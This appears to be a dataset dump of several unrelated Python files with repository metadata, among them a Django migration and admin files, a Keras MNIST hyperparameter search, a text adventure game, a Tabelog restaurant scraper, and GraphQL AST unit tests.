with open(os.path.join(out_path, 'song_instr.pkl'), 'wb') as f:
cPickle.dump(song_instr, f)
# save all instrument list to file
with open('all_instruments.txt', 'wb') as f:
f.write('\n'.join(all_instruments))
# get a dictionary mapping all instrument to sorted order
all_instruments_map = {e: i for i, e in enumerate(all_instruments)}
print 'Total number of labels = {}'.format(len(all_instruments))
# read mixed tracks
dpath = os.path.join(in_path, "Audio")
dlist = sorted(os.listdir(dpath)) # get list of tracks in sorted order
# write the list to file as reference for song_names in data
with open(os.path.join(out_path, 'song_name_list.txt'), 'wb') as f:
f.write('\n'.join(dlist))
# get a mapping of song names to their sorted order
song_name_map = {e: i for i, e in enumerate(dlist)}
for i in range(max(start_from, 0), len(dlist), save_size):
tdlist = dlist[i:i+save_size]
data = read_mixed_from_files(dpath, tdlist)
print 'finished reading file'
if norm_channel:
normalize_data(data)
print 'finished normalizing data'
# split to x second patches
for k, v in data.items():
patched_data = split_music_to_patches({k: v}, annotation,
all_instruments_map,
label_aggr, **kwargs)
temp_l = len(patched_data['song_name'])
patched_data['song_name'] = np.array([song_name_map[e] for e in
patched_data['song_name']],
dtype='float32'). \
reshape(temp_l, 1)
# save patches to file
patches_save_path = os.path.join(out_path, '{}_patched.mat'.
format(k))
if not os.path.exists(patches_save_path):
savemat(patches_save_path, patched_data)
del patched_data
print 'finished taking patches of {}'.format(k)
del data
gc.collect()
print 'finished {} of {}'.format(min(i+save_size, len(dlist)),
len(dlist))
def main():
root = os.path.abspath(os.sep)
in_path = os.path.join(root, 'Volumes', 'VOL2', 'MedleyDB')
prep_data(in_path, length=1, time_window=100.0, binary=False,
threshold=None)
| [
"[email protected]"
]
| |
da39ff189fd2c0d2ba922949117085f9ce98e2fa | 85be450530138c8b66c513c4283bcb1d58caeeb0 | /apps/funcionarios/migrations/0005_funcionario_imagem.py | bc149c39e59bf25051a7e604642ca132a0e9a4c1 | []
| no_license | fgomesc/gestao_teste | 6be81a263fddb1b1e5d6a2d768387fc024e9bdc3 | b2890ffa99361dd30b002706c94d1e5299651315 | refs/heads/master | 2021-09-25T06:21:51.602878 | 2021-09-14T18:27:13 | 2021-09-14T18:27:13 | 236,030,673 | 0 | 0 | null | 2021-06-10T22:31:09 | 2020-01-24T15:42:59 | JavaScript | UTF-8 | Python | false | false | 446 | py | # Generated by Django 2.1.1 on 2018-11-17 12:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('funcionarios', '0004_auto_20181029_2313'),
]
operations = [
migrations.AddField(
model_name='funcionario',
name='imagem',
field=models.ImageField(default=1, upload_to='fotos'),
preserve_default=False,
),
]
| [
"[email protected]"
]
| |
5438bf2918f6cb484ba4bfdaf5ceabf6e3a64e9b | e39f5ed824db24444580fabb42a06d8029d403ed | /machine_learning/class_03/lesson_01/mnist-search.py | 9be1204f3b77d45af7a43855106b3dad5f89bc30 | []
| no_license | tepkool01/uw_school | 4a027f10b1b7cd28ad2a64a224bdd0fbaa9c040c | 69490b53c0a1a1c7f4b318a988fe1b1e328e3163 | refs/heads/master | 2023-07-15T04:57:52.688896 | 2021-08-23T21:41:27 | 2021-08-23T21:41:27 | 303,208,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,492 | py | # pip install keras-tuner
import math
import numpy as np
from io import TextIOWrapper
from PIL import Image
from zipfile import ZipFile
trnX = np.zeros((60000, 28, 28), dtype = "float32")
trnY = np.zeros((60000), dtype = "int32")
tstX = np.zeros((10000, 28, 28), dtype = "float32")
with ZipFile("ml530-2021-sp-mnist.zip", "r") as archive:
index = 0
for i in range(trnX.shape[0]):
with archive.open("mnist_trn_images/mnist_trn_" + str(i).zfill(5) + ".png") as file:
img = Image.open(file)
trnX[i] = np.asarray(img)
index = index + 1
with TextIOWrapper(archive.open("mnist_trn.csv", "r")) as file:
header = file.readline()
for i in range(trnY.shape[0]):
trnY[i] = np.int32(file.readline().strip("\r\n").split(",")[1])
index = 0
for i in range(tstX.shape[0]):
with archive.open("mnist_tst_images/mnist_tst_" + str(i).zfill(5) + ".png") as file:
img = Image.open(file)
tstX[i] = np.asarray(img)
index = index + 1
trnX = trnX.reshape(trnX.shape[0], trnX.shape[1] * trnX.shape[2])
tstX = tstX.reshape(tstX.shape[0], tstX.shape[1] * tstX.shape[2])
trnX = trnX / 255
tstX = tstX / 255
from tensorflow import keras
from tensorflow.keras import callbacks, layers, optimizers
from kerastuner.tuners import RandomSearch, Hyperband, BayesianOptimization
class CustomTuner(Hyperband):
def run_trial(self, trial, *args, **kwargs):
batch_size = trial.hyperparameters.values["batch_size"]
kwargs["batch_size"] = batch_size
kwargs["steps_per_epoch"] = math.ceil(0.9 * trnX.shape[0] / batch_size)
super(CustomTuner, self).run_trial(trial, *args, **kwargs)
def build_model(hp):
depth = hp.Int("depth", min_value = 0, max_value = 4, step = 1)
width = hp.Choice("width", values = [ 64, 128, 256, 512 ])
activation = hp.Choice("activation", values = [ "linear", "relu", "sigmoid", "tanh" ])
dropout = hp.Float("dropout", 0, 0.5, step = 0.1)
optimizer = hp.Choice("optimizer", values = [ "adam", "rmsprop", "sgd" ])
learning_rate = hp.Choice("learning_rate", values = [ 0.01, 0.001, 0.0001 ])
batch_size = hp.Choice("batch_size", values = [ 512, 1024, 2048 ])
model = keras.Sequential()
for depth in range(depth):
model.add(layers.Dense(units = width, activation = activation))
model.add(layers.Dropout(dropout))
optimizer = optimizers.Adam
if (optimizer == "rmsprop"):
optimizer = optimizers.RMSprop
elif (optimizer == "sgd"):
optimizer = optimizers.SGD
model.add(layers.Dense(trnY.max() + 1, activation = "softmax"))
model.compile(optimizer = optimizer(learning_rate = learning_rate), loss = "sparse_categorical_crossentropy", metrics = [ "accuracy" ])
return model
#tuner = RandomSearch(build_model,
# objective = "val_accuracy",
# max_trials = 32,
# executions_per_trial = 1,
# directory = "tuning",
# project_name = "random")
#tuner = BayesianOptimization(build_model,
# objective = "val_accuracy",
# max_trials = 32,
# num_initial_points = 8,
# directory = "tuning",
# project_name = "bayesian")
#tuner = Hyperband(build_model,
# objective = "val_accuracy",
# max_epochs = 32,
# hyperband_iterations = 1,
# directory = "tuning",
# project_name = "bandit")
tuner = CustomTuner(build_model,
objective = "val_accuracy",
max_epochs = 32,
hyperband_iterations = 1,
directory = "tuning",
project_name = "bandit")
callbacks = [ callbacks.ReduceLROnPlateau(monitor = "val_accuracy", patience = 2),
callbacks.EarlyStopping(monitor = "val_accuracy", patience = 8, restore_best_weights = True) ]
tuner.search_space_summary()
tuner.search(trnX, trnY, validation_split = 0.1, callbacks = callbacks)
tuner.results_summary()
model = tuner.get_best_models(num_models = 1)[0]
hyperparameters = tuner.get_best_hyperparameters(num_trials = 1)[0].get_config()
print(hyperparameters["values"])
probabilities = model.predict(tstX)
classes = probabilities.argmax(axis = -1)
predictions = open("predictions.csv", "w")
predictions.write("id,label\n")
for i in range(tstX.shape[0]):
predictions.write(str(i).zfill(5) + "," + str(classes[i]) + "\n")
predictions.close()
model.summary()
| [
"[email protected]"
]
| |
c705c0b17acc935c371cb01c2c106b884fe5ba24 | fdbcef18ee57e350619cba7a0aa430f2bc832dcb | /scalingqa/retriever/hit_processing.py | 8611e4252ec2a8e158ff56bb0bcca96c1b8be205 | [
"MIT"
]
| permissive | Ankur3107/scalingQA | 5091f14bf14f53fbe198287e34d8c0376e40cdc8 | f648e34a9e4d7d4dbc2549a3c8767b6a25e3c447 | refs/heads/main | 2023-04-17T20:03:40.661471 | 2021-04-22T05:28:30 | 2021-04-22T05:28:30 | 360,213,015 | 0 | 0 | MIT | 2021-04-22T05:28:31 | 2021-04-21T15:08:34 | Python | UTF-8 | Python | false | false | 2,149 | py | import re
from ..common.drqa_tokenizers.simple_tokenizer import SimpleTokenizer
from ..common.utility.metrics import normalize
dpr_tokenizer = None
def process_hit_token_dpr(e, db, match_type="string"):
global dpr_tokenizer
if dpr_tokenizer is None:
dpr_tokenizer = SimpleTokenizer()
def regex_match(text, pattern):
"""Test if a regex pattern is contained within a text."""
try:
pattern = re.compile(
pattern,
flags=re.IGNORECASE + re.UNICODE + re.MULTILINE,
)
except BaseException:
return False
return pattern.search(text) is not None
def has_answer(answers, text, tokenizer, match_type) -> bool:
"""Check if a document contains an answer string.
If `match_type` is string, token matching is done between the text and answer.
If `match_type` is regex, we search the whole text with the regex.
"""
text = normalize(text)
if match_type == 'string':
# Answer is a list of possible strings
text = tokenizer.tokenize(text).words(uncased=True)
for single_answer in answers:
single_answer = normalize(single_answer)
single_answer = tokenizer.tokenize(single_answer)
single_answer = single_answer.words(uncased=True)
for i in range(0, len(text) - len(single_answer) + 1):
if single_answer == text[i: i + len(single_answer)]:
return True
elif match_type == 'regex':
# Answer is a regex
for single_answer in answers:
single_answer = normalize(single_answer)
if regex_match(text, single_answer):
return True
return False
top, answers, raw_question = e
if type(top) != list:
top = top.tolist()
for rank, t in enumerate(top):
text = db.get_doc_text(t)[0]
if has_answer(answers, text, dpr_tokenizer, match_type):
return {"hit": True, "hit_rank": rank}
return {"hit": False, "hit_rank": -1}
| [
"[email protected]"
]
| |
12431f449479c4225d285315b7a3bb921570c910 | efcd21234f3291e8fc561f49a7c88fc57a63e952 | /tests/unit/language/ast/test_directive_definition.py | b356575d34de9eab8e68c11d4445ef82a42fc23c | [
"MIT"
]
| permissive | tartiflette/tartiflette | 146214a43847d2f423bf74594643c1fdefc746f1 | 421c1e937f553d6a5bf2f30154022c0d77053cfb | refs/heads/master | 2023-09-01T02:40:05.974025 | 2022-01-20T14:55:31 | 2022-01-20T14:55:31 | 119,035,565 | 586 | 39 | MIT | 2023-09-11T07:49:27 | 2018-01-26T09:56:10 | Python | UTF-8 | Python | false | false | 6,673 | py | import pytest
from tartiflette.language.ast import DirectiveDefinitionNode
def test_directivedefinitionnode__init__():
directive_definition_node = DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
)
assert directive_definition_node.name == "directiveDefinitionName"
assert (
directive_definition_node.locations == "directiveDefinitionLocations"
)
assert (
directive_definition_node.description
== "directiveDefinitionDescription"
)
assert (
directive_definition_node.arguments == "directiveDefinitionArguments"
)
assert directive_definition_node.location == "directiveDefinitionLocation"
@pytest.mark.parametrize(
"directive_definition_node,other,expected",
[
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
Ellipsis,
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionNameBis",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocationsBis",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescriptionBis",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArgumentsBis",
location="directiveDefinitionLocation",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocationBis",
),
False,
),
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
True,
),
],
)
def test_directivedefinitionnode__eq__(
directive_definition_node, other, expected
):
assert (directive_definition_node == other) is expected
@pytest.mark.parametrize(
"directive_definition_node,expected",
[
(
DirectiveDefinitionNode(
name="directiveDefinitionName",
locations="directiveDefinitionLocations",
description="directiveDefinitionDescription",
arguments="directiveDefinitionArguments",
location="directiveDefinitionLocation",
),
"DirectiveDefinitionNode("
"description='directiveDefinitionDescription', "
"name='directiveDefinitionName', "
"arguments='directiveDefinitionArguments', "
"locations='directiveDefinitionLocations', "
"location='directiveDefinitionLocation')",
)
],
)
def test_directivedefinitionnode__repr__(directive_definition_node, expected):
assert directive_definition_node.__repr__() == expected
| [
"[email protected]"
]
| |
353d23ee1d8f260fdba75771dad1edcc93f3b402 | f09f92fb6d46d75ce92d3e1183adc68b8087a56e | /sandbox.py | b4af84ff90854b543f72b9ef82e6a7468f1b214b | []
| no_license | nikitafainberg/darkWorldAuth | d7f79ebb04ec0279c3b4b69a25e746d445a4ed19 | 24547eda0622fe15a1b3cfed674f2660623c2a0d | refs/heads/master | 2023-08-29T11:04:35.954817 | 2021-11-13T23:26:04 | 2021-11-13T23:26:04 | 427,531,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | from DB_manger import dbConnector
if __name__ == '__main__':
db_connector = dbConnector()
users = db_connector.get_user_by_username("nick")[0]
print(users)
| [
"[email protected]"
]
| |
eea33ae817b3fd5ed3cb9850e88cdc7f95ce66d3 | 2676b16638e5495fd85aa0ab1bb34a4869373015 | /exceptions.py | 0494599441bd3a56abae9eab930a1c58bf29a917 | []
| no_license | ryrysmiley/compsci230 | c9053f24fa3bec8ce84f92682b6a882c8e67c9fd | 0d4ece995d5c1b654dd230ada6a480198f4b926a | refs/heads/main | 2023-01-24T14:07:13.209862 | 2020-12-08T01:48:48 | 2020-12-08T01:48:48 | 315,526,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 779 | py | """
try:
f=open("test.txt")
print(f.read())
except FileNotFoundError:
print("File doesn't exist")
try:
x=int(input())
print(2/x)
except ValueError:
print("that is not an int")
except ZeroDivisionError:
print("can't divide by zero")
"""
user_input = ''
while user_input != "q":
try:
user_age=int(input("age"))
if user_age<=0:
raise ValueError("Invalid age")
print(user_age)
weight=int(input("weight"))
if weight<=0:
raise ValueError("Invalid weight")
print(weight)
height=int(input("height"))
if height<=0:
raise ValueError("Invalid height")
print(height)
except ValueError as e:
print(e)
user_input = input("q to quit")
| [
"[email protected]"
]
| |
045e3b79ee98a308915d4259f3453d80f710f82a | 2fdc236b11ad16052ceab7f566657fca41f1f45e | /ex43.py | 6a274bbbb087040ef06becf94b2fcb75158b37d6 | []
| no_license | HeshamBahgat/Learn-Python-The-Hard-Way | 6bc155e18efaf24cdf90a591149b8e97b3926337 | 67a6d1320eb9964f6db0cf435b1f319cb14c7a3b | refs/heads/master | 2020-06-03T01:05:11.992987 | 2019-06-11T13:27:34 | 2019-06-11T13:27:34 | 191,370,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,711 | py | from sys import exit
from random import randint
from textwrap import dedent
## adventure game
class Scene(object):
def enter(self):
print("This scene is not yet configured")
print("Subclass it and implement enter().")
exit(1)
class Enigne(object):
def __init__(self, scene_map):
self.scene_map = scene_map
def play(self):
current_scene = self.scene_map.opening_scene()
last_scene = self.scene_map.next_scene("finished")
while current_scene != last_scene:
next_scene_name = current_scene.enter()
current_scene = self.scene_map.next_scene(next_scene_name)
# be sure to print out the last scene
current_scene.enter()
class Death(Scene):
quips = [
"You died. You kinda suck at this.",
"Your Mom would be pround...if she were smarter."
"Such a luser."
"I have a small puppy that's better st this."
"You're worse than your Dad's jokes."]
def enter(self):
print(Death.quips[randint(0, len(self.quips)-1)])
exit(1)
class CentralCorridor(Scene):
def enter(self):
print(dedent('''
The Gothons of planet percal #25 have invaded your ship and destroyed your entire crew.
You are the last surviving member and your last mission is to get the neutron destruct bomb from the weapon Armory,
put it in the bridge, and blow the shio up after getting into an escape pod
You're running down the central corridor to the weapons Armory when a Gothon jumps out.
red scaly skin, dark grimy teeth, and evil clown costume flowing around his hate filled body. He's blocking the door to the Armory
and about to pull a weapon to blast you'''))
action = input("> ")
if action == "shoot!":
print(dedent("""
Quick on the draw you yank out your blaster and fire
it at the Gothon. His clown costume is flowing and
moving around his body, which throws off your aim.
Your laser hits his costume but misses him entirely.
This completely ruins his brand new costume his mother
bought him, which makes him fly into an insane rage
and blast you repeatedly in the face until you are
dead. Then he eats you.
"""))
return "Death"
elif action == "tell a joke":
print(dedent("""
Lucky for you they made you learn Gothon insults in
the academy. You tell the one Gothon joke you know:
Lbhe zbgure vf fb sng, jura fur fvgf nebhaq gur ubhfr,
fur fvgf nebhaq gur ubhfr. The Gothon stops, tries
not to laugh, then busts out laughing and can't move.
While he's laughing you run up and shoot him square in
the head putting him down, then jump through the
Weapon Armory door.
"""))
return 'laser_weapon_armory'
else:
print("Does NOT Compute!")
return "central_corridor"
class LaserWeaponArmory(Scene):
def enter(self):
print(dedent("""
You do a dive roll into the Weapon Armory, crouch and scan
the room for more Gothons that might be hiding. It's dead
quiet, too quiet. You stand up and run to the far side of
the room and find the neutron bomb in its container.
There's a keypad lock on the box and you need the code to
get the bomb out. If you get the code wrong 10 times then
the lock closes forever and you can't get the bomb. The
code is 3 digits.
"""))
code = f"{randint(1,9)}{randint(1,9)}{randint(1,9)}"
print (code)
guess = input("[keypad> ]")
guesses = 0
while guess != code and guesses < 10:
print("BZZZZEDDD")
guesses += 1
guess = input("[keypad> ]")
if guess == code:
print(dedent("""
The container clicks open and the seal breaks, letting
gas out. You grab the neutron bomb and run as fast as
you can to the bridge where you must place it in the
right spot.
"""))
return 'the_bridge'
else:
print(dedent("""
The lock buzzes one last time and then you hear a
sickening melting sound as the mechanism is fused
together. You decide to sit there, and finally the
Gothons blow up the ship from their ship and you die.
"""))
return 'death'
class TheBridge(Scene):
def enter(self):
print(dedent("""
You burst onto the Bridge with the netron destruct bomb
under your arm and surprise 5 Gothons who are trying to
take control of the ship. Each of them has an even uglier
clown costume than the last. They haven't pulled their
weapons out yet, as they see the active bomb under your
arm and don't want to set it off.
"""))
action = input("> ")
if action == "throw the bomb":
print(dedent("""
In a panic you throw the bomb at the group of Gothons
and make a leap for the door. Right as you drop it a
Gothon shoots you right in the back killing you. As
you die you see another Gothon frantically try to
disarm the bomb. You die knowing they will probably
blow up when it goes off.
"""))
return 'death'
elif action == "slowly place the bomb":
print(dedent("""
You point your blaster at the bomb under your arm and
the Gothons put their hands up and start to sweat.
You inch backward to the door, open it, and then
carefully place the bomb on the floor, pointing your
blaster at it. You then jump back through the door,
punch the close button and blast the lock so the
Gothons can't get out. Now that the bomb is placed
you run to the escape pod to get off this tin can.
"""))
return 'escape_pod'
else:
print("DOES NOT COMPUTE!")
return "the_bridge"
class EscapePod(Scene):
def enter(self):
def enter(self):
print(dedent("""
You rush through the ship desperately trying to make it to
the escape pod before the whole ship explodes. It seems
like hardly any Gothons are on the ship, so your run is
clear of interference. You get to the chamber with the
escape pods, and now need to pick one to take. Some of
them could be damaged but you don't have time to look.
There's 5 pods, which one do you take?
"""))
good_pod = randint(1, 5)
print(good_pod)
guess = input("[pod #]> ")
if int(guess) != good_pod:
print(dedent("""
You jump into pod {guess} and hit the eject button.
The pod escapes out into the void of space, then
implodes as the hull ruptures, crushing your body into
jam jelly.
"""))
return 'death'
else:
print(dedent("""
You jump into pod {guess} and hit the eject button.
The pod easily slides out into space heading to the
planet below. As it flies to the planet, you look
back and see your ship implode then explode like a
bright star, taking out the Gothon ship at the same
time. You won!
"""))
return 'finished'
class Finished(Scene):
def enter(self):
print("You won! Good job")
return "Finished"
class Map(object):
scenes = {
'central_corridor': CentralCorridor(),
'laser_weapon_armory': LaserWeaponArmory(),
'the_bridge': TheBridge(),
'escape_pod': EscapePod(),
'death': Death(),
'finished': Finished(),
}
def __init__(self, start_scene):
self.start_scene = start_scene
def next_scene(self, scene_name):
va1 = Map.scenes.get(scene_name)
return va1
def opening_scene(self):
return self.next_scene(self.start_scene)
a_map = Map('central_corridor')
a_game = Enigne(a_map)
a_game.play()
"""
1- map class will store all scene as a dic and each scene has a key to call the scene as a function
2- engine will control the map class, two variables will be created then seneses will be callen depends on these variables
3- theses variables will use method from map class and sene dic
""" | [
"[email protected]"
]
| |
47cc53e4d489c658835626b31746754eba3a8c9b | 361270624816c78772e39efd5dc3269da19fd156 | /test.py | a14298a618e48218120391c19beb2ce733c295d8 | []
| no_license | Dairaku/Scraping | 4f14c741b8a16ca33393fcf146b34e7896b38ab4 | ab39f3542c1fc61148249faac31b5bcc59f76639 | refs/heads/master | 2020-05-27T14:29:10.364824 | 2019-05-26T08:51:38 | 2019-05-26T08:51:38 | 188,660,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,646 | py | #!/usr/bin/env python
# coding: utf-8
import csv
import requests
from urllib.request import urlopen
from bs4 import BeautifulSoup
import ssl
import re
import pandas as pd
import time
base_url = "https://tabelog.com/tokyo/A1304/A130401/rstLst/"
begin_page = 1
end_page = 10
#最終ページの計算用
r_base = requests.get(base_url)
soup_base = BeautifulSoup(r_base.content, 'html.parser')
page_num = begin_page
#csvリストの作成
csvlist = [["store_name", "score", "review_num", "url", "category_name", "reserve_tel", "prefecture", "district", "seat_num", "facebook", "restaurant_tel", "homepage", "open_date"]]
#CSVファイルを開く。ファイルがなければ新規作成する。
f = open("output.csv", "w", encoding="utf_8_sig")
writecsv = csv.writer(f, lineterminator='\n')
while True:
list_url = base_url + str(page_num) + "/"
print(list_url)
# 一覧ページで、ページネーション順に取得
r1 = requests.get(list_url)
soup1 = BeautifulSoup(r1.content, 'lxml')
soup_a_list = soup1.find_all('a', class_='list-rst__rst-name-target')
# 店の個別ページURLを取得
for soup_a in soup_a_list:
item_url = soup_a.get('href')
print(item_url)
r = requests.get(item_url)
soup = BeautifulSoup(r.content, 'lxml')
#点数
try:
score = soup.find("span", class_="rdheader-rating__score-val-dtl").get_text()
print(score)
except:
score="NULL"
pass
print(score)
# 口コミ数
try:
review_num = soup.find("em", class_="num").get_text()
except:
review_num="NULL"
pass
print(review_num)
#情報取得
info = str(soup)
#店舗名
try:
store_name = info.split('display-name')[1].split('<span>')[1].split('</span>')[0].strip()
except:
store_name="NULL"
pass
print(store_name)
#ジャンル名
try:
category_name = info.split('<th>ジャンル</th>')[1].split('<td>')[1].split('</td>')[0].split('<span>')[1].split('</span>')[0].strip()
except:
category_name="NULL"
pass
print(category_name)
#予約電話番号
try:
reserve_tel = info.split('<strong class="rstinfo-table__tel-num">')[1].split('</strong>')[0].strip()
except:
reserve_tel="NULL"
pass
print(reserve_tel)
#都道府県
try:
prefecture = info.split('<p class="rstinfo-table__address">')[1].split('/">')[1].split('</a>')[0].strip()
except:
prefecture="NULL"
pass
print(prefecture)
#区
try:
district = info.split('<p class="rstinfo-table__address">')[1].split('/rstLst/')[1].split('">')[1].split('</a>')[0].strip()
except:
district="NULL"
pass
print(district)
#席数
try:
seat_num = info.split('<th>席数</th>')[1].split('<td>')[1].split('</td>')[0].split('<p>')[1].split('席</p>')[0].strip()
except:
seat_num="NULL"
pass
print(seat_num)
#公式アカウント facebook
try:
facebook = info.split('rstinfo-sns-link rstinfo-sns-facebook')[1].split('<span>')[1].split('</span>')[0].strip()
except:
facebook="NULL"
pass
print(facebook)
#電話番号
try:
restaurant_tel = info.split('<th>電話番号</th>')[1].split('<strong class="rstinfo-table__tel-num">')[1].split('</strong>')[0].strip()
except:
restaurant_tel="NULL"
pass
print(restaurant_tel)
#ホームページ
try:
homepage = info.split('<th>ホームページ</th>')[1].split('<span>')[1].split('</span>')[0].strip()
except:
homepage="NULL"
pass
print(homepage)
#オープン日
try:
open_date = info.split('rstinfo-opened-date">')[1].split('</p>')[0].strip()
except:
open_date="NULL"
pass
print(open_date)
#csvリストに順に追加
csvlist.append([store_name, score, review_num, item_url, category_name, reserve_tel, prefecture, district, seat_num, facebook, restaurant_tel, homepage, open_date])
if page_num >= end_page:
print(csvlist)
break
page_num += 1
# 出力
writecsv.writerows(csvlist)
# CSVファイルを閉じる
f.close()
| [
"[email protected]"
]
| |
4cb3844e79b7b04d524f902a1436ea166712750d | 7bc1d2a995ce6488c7dd20909a6f9443d6d8ced8 | /admin.py | f9970ac554b7883eb5ab7ee1f153581bbdd2be7d | []
| no_license | strategy2231/django_learn | dd4f7d1bd77157b893a8ea2d8355e980898687f5 | 9b9544c24d42892acef53943eb707bc5b8ca48c3 | refs/heads/master | 2021-01-12T16:01:43.756219 | 2016-10-25T18:45:48 | 2016-10-25T18:45:48 | 71,918,737 | 0 | 0 | null | 2016-10-25T18:40:31 | 2016-10-25T16:50:45 | Python | UTF-8 | Python | false | false | 612 | py |
# Register your models here.
from django.contrib import admin
from restaurants.models import Restaurant, Food,Comment
class RestaurantAdmin(admin.ModelAdmin):
list_display = ('name', 'phone_number', 'address','date')
search_fields = ('name',)
class FoodAdmin(admin.ModelAdmin):
list_display = ('name', 'restaurant', 'price','is_spicy','comment','date')
list_filter = ('is_spicy',)
#fields = ('price','restaurant')
search_fields = ('name',)
ordering = ('-price',)
admin.site.register(Restaurant,RestaurantAdmin)
admin.site.register(Food,FoodAdmin)
admin.site.register(Comment) | [
"[email protected]"
]
| |
641513afa36e0a025b2386b2d085f86762f8831c | 414e0f17a1da288c5e7e7753eb51e44457480637 | /General/migrations/0002_auto_20190313_1534.py | 713c68f71c7cff04bfc69ae12424b2d9f7e74d5e | []
| no_license | livemonkey1300/ajax | ccb0103535c348cb2cf7190615bc1b696da6d469 | 429d1e6ebb32ef36cf320a9211b1430396e33576 | refs/heads/master | 2020-04-27T14:23:58.523709 | 2019-03-18T20:55:09 | 2019-03-18T20:55:09 | 174,408,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | # Generated by Django 2.1.5 on 2019-03-13 15:34
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('General', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='exchange',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='virtual_machine',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='voip',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"[email protected]"
]
| |
c89805f2b8005e92a1594b95d1049d78bddbe0f2 | 4254edac798c604dc59b5d586b52357b75d9e302 | /day7/alvdevops0505/alvdevops0505/urls.py | 242561d038498dd1c909378c56d28c8934155de5 | []
| no_license | casey-smile/P27M01 | 5531c3e5874e9308deebcd90eb6aaf1b91eb42eb | 8fd3255c7785f63d5bc1c81d9703674ffc5fdf39 | refs/heads/master | 2022-09-23T14:28:31.801166 | 2020-05-29T16:23:06 | 2020-05-29T16:23:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 890 | py | """alvdevops0505 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('',include('users.urls', namespace='users')),
path('accounts/', include('accounts.urls', namespace='accounts')),
]
| [
"[email protected]"
]
| |
82792a3be9979e79865b11f08d068150204766e1 | 2c74bb301f1ed83b79254944183ac5a18a639fdf | /tests/components/select/test_device_condition.py | 7c1dc443e5626cdb246bbc9a3f633cbd756d466c | [
"Apache-2.0"
]
| permissive | Adminiuga/home-assistant | 5bec93007ddac1a268cc359bf7e48530c5f73b38 | dcf68d768e4f628d038f1fdd6e40bad713fbc222 | refs/heads/dev | 2023-02-22T22:03:31.013931 | 2022-11-09T00:27:20 | 2022-11-09T00:27:20 | 123,929,062 | 5 | 4 | Apache-2.0 | 2023-02-22T06:14:31 | 2018-03-05T14:11:09 | Python | UTF-8 | Python | false | false | 8,288 | py | """The tests for Select device conditions."""
from __future__ import annotations
import pytest
import voluptuous_serialize
from homeassistant.components import automation
from homeassistant.components.device_automation import DeviceAutomationType
from homeassistant.components.select import DOMAIN
from homeassistant.components.select.device_condition import (
async_get_condition_capabilities,
)
from homeassistant.core import HomeAssistant, ServiceCall
from homeassistant.helpers import (
config_validation as cv,
device_registry,
entity_registry,
)
from homeassistant.helpers.entity import EntityCategory
from homeassistant.setup import async_setup_component
